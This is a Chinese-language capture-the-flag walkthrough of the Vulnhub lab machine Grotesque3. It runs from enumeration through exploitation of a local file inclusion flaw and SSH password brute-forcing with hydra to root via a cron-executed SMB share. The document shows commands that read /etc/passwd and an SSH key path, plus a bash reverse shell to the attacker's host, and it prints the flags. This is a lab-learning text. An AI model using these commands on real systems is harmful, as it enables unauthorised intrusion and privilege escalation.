Grotesque3识别目标主机IP地址
─(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor 192.168.56.100 08:00:27:a8:8b:04 1 60 PCS Systemtechnik GmbH 192.168.56.156 08:00:27:de:25:1a 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.156
NMAP扫描
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.156 -oN nmap_full_scanStarting Nmap 7.92 ( https://nmap.org ) at 2023-04-26 22:34 EDTNmap scan report for bogon (192.168.56.156)Host is up (0.0013s latency).Not shown: 65533 filtered tcp ports (no-response)PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)| ssh-hostkey: | 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)80/tcp open http Apache httpd 2.4.38 ((Debian))|_http-title: Site doesn't have a title (text/html).|_http-server-header: Apache/2.4.38 (Debian)MAC Address: 08:00:27:DE:25:1A (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 121.48 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)
获得Shell
浏览器访问80端口,返回页面图片中有提示md5?
可能指的是目录字典需要md5加密?
(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ for each in $(cat /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt );do echo $each | md5sum >> dirmd5.txt;done
然后去掉每行结果的’-‘
$ sed -i 's/-//' dirmd5.txt
然后删除空格:
(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ sed -e 's/[[:blank:]]\+$//' -i dirmd5.txt
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ gobuster dir -u http://192.168.56.156 -w dirmd5.txt -x .php,.html,.txt,.sh,.js,.bak===============================================================Gobuster v3.5by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url: http://192.168.56.156[+] Method: GET[+] Threads: 10[+] Wordlist: dirmd5.txt[+] Negative Status codes: 404[+] User Agent: gobuster/3.5[+] Extensions: txt,sh,js,bak,php,html[+] Timeout: 10s===============================================================2023/04/26 23:23:45 Starting gobuster in directory enumeration mode===============================================================/f66b22bf020334b04c7d0d3eb5010391.php (Status: 200) [Size: 0]
利用gobuster工具发现了文件
但是访问该文件,返回为空,做一下FUZZ测试(模糊测试)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ wfuzz -c -u 'http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../etc/passwd' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 3.1.0 - The Web Fuzzer *********************************************************Target: http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=../../../../../etc/passwdTotal requests: 220560=====================================================================ID Response Lines Word Chars Payload =====================================================================000017563: 200 27 L 40 W 1457 Ch "purpose"
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ curl http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../etc/passwdroot:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologinsshd:x:105:65534::/run/sshd:/usr/sbin/nologinfreddie:x:1000:1000:freddie,,,:/home/freddie:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinmysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
经过测试,目标存在本地文件包含漏洞。接下里的目标是得到shell,先看下是否有SSH私钥文件
──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ curl http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?purpose=../../../../home/freddie/.ssh/id_rsa
没有内容返回,表明目标用户freddie不存在SSH私钥文件,接下来看是否存在远程文件包含
在Kali Linux上启动http.server,然后浏览器访问:
http://192.168.56.156/f66b22bf020334b04c7d0d3eb5010391.php?purpose=http://192.168.56.230:8000/test.txt
经测试,目标不存在远程文件包含漏洞。
那看下是否可以破解用户freddie的ssh密码
──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ hydra -l freddie -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.156 Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
运行了15分钟仍然没有破解出来。
密码字典应该用之前的得到md5运算后的字典。
──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ hydra -l freddie -P dirmd5.txt ssh://192.168.56.156Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-27 03:00:28[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore[DATA] max 16 tasks per 1 server, overall 16 tasks, 433752 login tries (l:1/p:433752), ~27110 tries per task[DATA] attacking ssh://192.168.56.156:22/[STATUS] 145.00 tries/min, 145 tries in 00:01h, 433610 to do in 49:51h, 13 active[STATUS] 92.00 tries/min, 276 tries in 00:03h, 433479 to do in 78:32h, 13 active[STATUS] 85.86 tries/min, 601 tries in 00:07h, 433154 to do in 84:06h, 13 active[STATUS] 83.60 tries/min, 1254 tries in 00:15h, 432501 to do in 86:14h, 13 active[22][ssh] host: 192.168.56.156 login: freddie password: 61a4e3e60c063d1e472dd780f64e6cad1 of 1 target successfully completed, 1 valid password found[WARNING] Writing restore file because 3 final worker threads did not complete until end.[ERROR] 3 targets did not resolve or could not be connected[ERROR] 0 target did not completeHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-27 03:29:04
得到了用户freddie的密码
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ ssh freddie@192.168.56.156 The authenticity of host '192.168.56.156 (192.168.56.156)' can't be established.ED25519 key fingerprint is SHA256:P07e9iTTwbyQae7lGtYu8i4toAyBfYkXY9/kw/dyv/4.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.156' (ED25519) to the list of known hosts.freddie@192.168.56.156's password: Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.freddie@grotesque:~$ iduid=1000(freddie) gid=1000(freddie) groups=1000(freddie),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)freddie@grotesque:~$ sudo -l-bash: sudo: command not foundfreddie@grotesque:~$ ls -alhtotal 20Kdrwxr-xr-x 4 freddie freddie 4.0K Apr 26 23:41 .drwxr-xr-x 3 root root 4.0K Dec 17 2020 ..drwx------ 3 freddie freddie 4.0K Apr 26 23:41 .gnupgdrwx------ 2 freddie freddie 4.0K Jul 11 2021 .ssh-r-x------ 1 freddie freddie 32 Jul 11 2021 user.txtfreddie@grotesque:~$ cat user.txt35A7EB682E33E89606102A883596A880
提权
pspy是一个命令行工具,它可以在没有Root权限的情况下,监控Linux进程。将pspy64上传到目标主机/tmp目录,修改权限,执行pspy64
其中有一行:
2023/04/27 00:38:01 CMD: UID=0 PID=3858 | /bin/sh -c bash /smbshare/*
似乎root会执行/smbshare下的脚本,用ss命令看一下端口
freddie@grotesque:/tmp$ ss -tunlpNetid State Recv-Q Send-Q Local Address:Port Peer Address:Port udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:* udp UNCONN 0 0 192.168.56.255:137 0.0.0.0:* udp UNCONN 0 0 192.168.56.156:137 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:137 0.0.0.0:* udp UNCONN 0 0 192.168.56.255:138 0.0.0.0:* udp UNCONN 0 0 192.168.56.156:138 0.0.0.0:* udp UNCONN 0 0 0.0.0.0:138 0.0.0.0:* tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* tcp LISTEN 0 50 0.0.0.0:445 0.0.0.0:* tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 50 0.0.0.0:139 0.0.0.0:* tcp LISTEN 0 128 *:80 *:* tcp LISTEN 0 50 [::]:445 [::]:* tcp LISTEN 0 50 [::]:139 [::]:*
可以看到目标确实有SMB协议
freddie@grotesque:/tmp$ smbclient -L 127.0.0.1Unable to initialize messaging contextEnter WORKGROUP\freddie's password: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers grotesque Disk grotesque IPC$ IPC IPC Service (Samba 4.9.5-Debian)Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP GROTESQUEfreddie@grotesque:/tmp$ smbclient //127.0.0.1/grotesqueUnable to initialize messaging contextEnter WORKGROUP\freddie's password: Try "help" to get a list of possible commands.smb: \> ls . D 0 Sun Jul 11 09:24:27 2021 .. D 0 Sun Jul 11 09:20:30 2021 1942736 blocks of size 1024. 674116 blocks availablesmb: \>
所以可以上传shell脚本到上述共享目录
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ cat escalate.sh #!/bin/bashbash -i >& /dev/tcp/192.168.56.230/6666 0>&1
freddie@grotesque:/tmp$ wget http://192.168.56.230:8000/escalate.sh--2023-04-27 00:45:19-- http://192.168.56.230:8000/escalate.shConnecting to 192.168.56.230:8000... connected.HTTP request sent, awaiting response... 200 OKLength: 57 [text/x-sh]Saving to: ‘escalate.sh’escalate.sh 100%[============================================================================>] 57 --.-KB/s in 0s 2023-04-27 00:45:19 (11.9 MB/s) - ‘escalate.sh’ saved [57/57]freddie@grotesque:/tmp$ chmod +x escalate.sh freddie@grotesque:/tmp$ smbclient //127.0.0.1/grotesqueUnable to initialize messaging contextEnter WORKGROUP\freddie's password: Try "help" to get a list of possible commands.smb: \> put escalate.sh putting file escalate.sh as \escalate.sh (0.4 kb/s) (average 0.4 kb/s)smb: \> ls . D 0 Thu Apr 27 00:46:08 2023 .. D 0 Sun Jul 11 09:20:30 2021 escalate.sh A 57 Thu Apr 27 00:46:08 2023 1942736 blocks of size 1024. 674112 blocks availablesmb: \>
┌──(kali㉿kali)-[~/Desktop/Vulnhub/grotesque3]└─$ sudo nc -nlvp 6666 [sudo] password for kali: listening on [any] 6666 ...connect to [192.168.56.230] from (UNKNOWN) [192.168.56.156] 59614bash: cannot set terminal process group (3986): Inappropriate ioctl for devicebash: no job control in this shellroot@grotesque:~# ididuid=0(root) gid=0(root) groups=0(root)root@grotesque:~# cd /rootcd /rootroot@grotesque:~# ls -alhls -alhtotal 16Kdrwx------ 2 root root 4.0K Jul 11 2021 .drwxr-xr-x 19 root root 4.0K Jul 11 2021 ..-rw------- 1 root root 42 Jul 11 2021 .bash_history-r-x------ 1 root root 32 Jul 11 2021 root.txtroot@grotesque:~# cat root.txtcat root.txt5C42D6BB0EE9CE4CB7E7349652C45C4Aroot@grotesque:~#
STRIVE FOR PROGRESS,NOT FOR PERFECTION